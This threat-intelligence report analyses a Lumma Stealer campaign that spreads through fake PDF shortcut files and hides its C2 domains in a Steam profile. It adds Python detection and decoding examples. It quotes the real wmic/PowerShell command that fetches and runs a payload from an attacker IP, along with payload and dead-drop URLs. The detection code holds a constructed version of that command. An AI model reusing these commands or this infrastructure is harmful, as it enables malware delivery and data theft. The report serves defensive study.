Executive Summary
Lumma Stealer is an information-stealing malware offered through a Malware-as-a-Service (MaaS) platform. It is designed to steal sensitive data, including passwords, browser information, and cryptocurrency wallet details.
This report details an ongoing malware campaign distributing the Lumma Stealer information stealer. The campaign's primary infection vector is malicious LNK (shortcut) files crafted to appear as legitimate PDF documents. When executed, these LNK files initiate a multi-stage infection process that ultimately deploys Lumma Stealer on the victim's machine. Because the campaign relies on tricking users into executing malicious files, it highlights the importance of user awareness and robust security controls. The campaign targets multiple industries, including Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.
Previously, we published two in-depth research reports analyzing the Lumma Stealer campaign, detailing the tactics, techniques, and procedures (TTPs) threat actors use to distribute and deploy the malware.
- How Threat Actors Exploit Brand Collaborations to Target Popular YouTube Channels
- Unmasking the Danger: Lumma Stealer Malware Exploits Fake CAPTCHA Pages
Attribution and Analysis
During a drive-by compromise, the user is initially redirected to a WebDAV server while visiting certain websites, unknowingly establishing a connection. This redirection may trigger an explorer.exe window preview, displaying the contents of the WebDAV server, which hosts malicious files designed to exploit system vulnerabilities or deliver malware.
In the analyzed infrastructure, malicious files were hosted on a WebDAV server in the open directory “http://87[.]120[.]115[.]240/Downloads/254-zebar-school-for-children-thaltej-pro-order-abad-rural.pdf.lnk”. When a user clicks to download what appears to be a school fee structure, they unknowingly download a malicious “.pdf.lnk” file, which looks like a PDF because of its icon.
The directory primarily contained “.lnk” files, which were weaponized to download additional malicious payloads using “mshta.exe”, a legitimate Microsoft executable that runs Microsoft HTML Application (HTA) files.
LNK (shortcut) files are often leveraged as an entry point in phishing campaigns. By exploiting their unique features, threat actors can deceive users and bypass security measures, making them effective tools for infiltrating systems and networks.
The LNK file runs a PowerShell command that connects to a remote server, triggering the next stage of the attack:
“C:\Windows\System32\Wbem\wmic.exe process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"”
These deceptive shortcuts, often camouflaged as legitimate executables or PDF files, entice unsuspecting users to click, ultimately compromising their systems or networks.
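The chain above (a “.pdf.lnk” double extension, wmic.exe launching PowerShell, and a wildcard path such as “\*i*\S*3*\m*ta.e*” that globs to mshta.exe) can be expressed as process-creation detection rules. The following Python is an added example, not part of the original report; the events, file name and 203.0.113.10 URL are constructed, and the LOLBin reference list is an assumption you would extend for your own environment.

```python
import re
from fnmatch import fnmatchcase

# Constructed process-creation events modelled on the observed chain
# (LNK -> wmic.exe "process call create" -> powershell -> wildcard-resolved mshta.exe).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\victim\Downloads\fee-structure.pdf.lnk"'},
    {"image": r"C:\Windows\System32\Wbem\wmic.exe",
     "cmdline": r"""wmic.exe process call create "powershell iex '\*i*\S*3*\m*ta.e* https://203.0.113.10/stage2' | powershell -" """},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# Drive-relative paths of LOLBins a wildcard token could resolve to (assumed reference list).
KNOWN_LOLBINS = [r"\Windows\System32\mshta.exe", r"\Windows\System32\rundll32.exe",
                 r"\Windows\System32\regsvr32.exe", r"\Windows\System32\certutil.exe"]

# A backslash-rooted token that contains at least one '*' (PowerShell globs these).
WILDCARD_PATH = re.compile(r"""\\[^\s'"|]*\*[^\s'"|]*""")


def resolve_wildcard(token):
    """Return the known LOLBins whose path the wildcard token would match."""
    return [p for p in KNOWN_LOLBINS if fnmatchcase(p, token)]


def detect(event):
    """Return the rule names an event triggers (empty list for benign events)."""
    hits = []
    cmd = event["cmdline"]
    low = cmd.lower()
    # Rule 1: shortcut disguised as a document via a double extension.
    if re.search(r"\.pdf\.lnk\b", low):
        hits.append("double_extension_lnk")
    # Rule 2: WMIC used to launch PowerShell (breaks the normal parent/child tree).
    if event["image"].lower().endswith(r"\wmic.exe") and "process call create" in low \
            and "powershell" in low:
        hits.append("wmic_spawns_powershell")
    # Rule 3: wildcard-obfuscated path that globs to a known LOLBin.
    for token in WILDCARD_PATH.findall(cmd):
        for path in resolve_wildcard(token):
            hits.append("wildcard_lolbin:" + path.rsplit("\\", 1)[-1].lower())
    return hits


def scan(events=SAMPLE_EVENTS):
    """Map event index -> triggered rules, skipping events with no hits."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}
```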
We extracted the script by dumping the overlay section, revealing obfuscated JavaScript code.
Obfuscated JavaScript code in overlay section of Samarik
This function evaluates the JavaScript code stored in the variable aeQ. The use of eval is a common technique in obfuscated or malicious scripts.
The obfuscated JavaScript ultimately yields a PowerShell script. This PowerShell script contains an AES-encrypted payload and a routine that decrypts it in CBC mode using a hardcoded key; it also uses simple arithmetic obfuscation.
The PowerShell script's normalized variables and functions show how the payload is downloaded and executed.
The final PowerShell script downloads the payload from https[:]//80.76.51[.]231/Kompass-4.1.2.exe, extracts its contents, and executes “Kompass-4.1.2.exe” (Lumma Stealer).
After infecting a system, Lumma Stealer attempts to connect to its command and control (C2) servers to exfiltrate stolen data. It tries to reach multiple C2 domains; however, these servers were inaccessible at the time of analysis.
If the sample cannot reach any of its C2 domains, it falls back to a Steam connection. The Steam URL differs from the C2 domains in that it is stored and decrypted by a separate routine in the code.
hxxps://steamcommunity.com/profiles/76561199724331900
The number 76561199724331900 follows the Steam64 ID format, suggesting that a Steam client or game might be attempting to resolve a network service. This indicates that a device on the network is trying to resolve a name (likely related to a Steam session or game server). The profile was created on June 28, 2024.
C2 cloaking via Steam profiles is a sophisticated evasion technique that abuses a trusted platform for stealthy command & control communication.
The threat actor most likely created this Steam profile. The sample first fetches the profile page, parses the "actual_persona_name" element to extract the string, and then applies a Caesar-cipher shift to decrypt it and recover the C2 domains.
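An analyst reproducing the dead-drop resolution described above can brute-force the Caesar shift offline. The following Python is an added example, not code from the report or from the malware: the profile HTML fragment, the persona name (plaintext "relay.example.com" shifted by 7) and the TLD allow-list used to rank candidates are all constructed for this example.

```python
import re
from html import unescape

# Constructed Steam profile fragment; the persona name is a Caesar-shifted domain
# (plaintext "relay.example.com", shift 7, both chosen for this example).
SAMPLE_PROFILE_HTML = """
<div class="profile_header_centered_persona">
  <div class="persona_name" style="font-size: 24px;">
    <span class="actual_persona_name">ylshf.lehtwsl.jvt</span>
  </div>
</div>
"""

PERSONA_RE = re.compile(r'class="actual_persona_name"[^>]*>(.*?)</span>', re.S)
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")
# Small TLD allow-list used to rank brute-forced shifts (assumed; extend as needed).
COMMON_TLDS = {"com", "net", "org", "info", "xyz", "top", "shop", "site", "online", "io"}


def extract_persona_name(html):
    """Pull the text of the actual_persona_name span out of a profile page."""
    m = PERSONA_RE.search(html)
    return unescape(m.group(1)).strip() if m else None


def caesar(text, shift):
    """Rotate ASCII letters by `shift`, leaving digits, dots and dashes untouched."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def recover_domains(html):
    """Try all 26 shifts; keep outputs that look like a domain with a known TLD."""
    name = extract_persona_name(html)
    if not name:
        return []
    found = []
    for shift in range(26):
        candidate = caesar(name, -shift).lower()
        if DOMAIN_RE.match(candidate) and candidate.rsplit(".", 1)[-1] in COMMON_TLDS:
            found.append((shift, candidate))
    return found
```

Feeding the recovered domains into DNS and proxy logs lets a defender hunt for the fallback channel even while the primary C2 domains are down.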
Based on the lure file names, which mimic legitimate PDF documents (e.g., contracts, financial reports, academic materials, and technical brochures), the Lumma Stealer campaign targets industries including but not limited to Education & Academia, Corporate & Business, Government & Legal, Healthcare & Pharmaceuticals, Financial & Banking, Engineering & Manufacturing, Technology & Blockchain, and Media & Journalism.
MITRE ATT&CK Tactics and Techniques:
Indicators of Compromise (IoCs):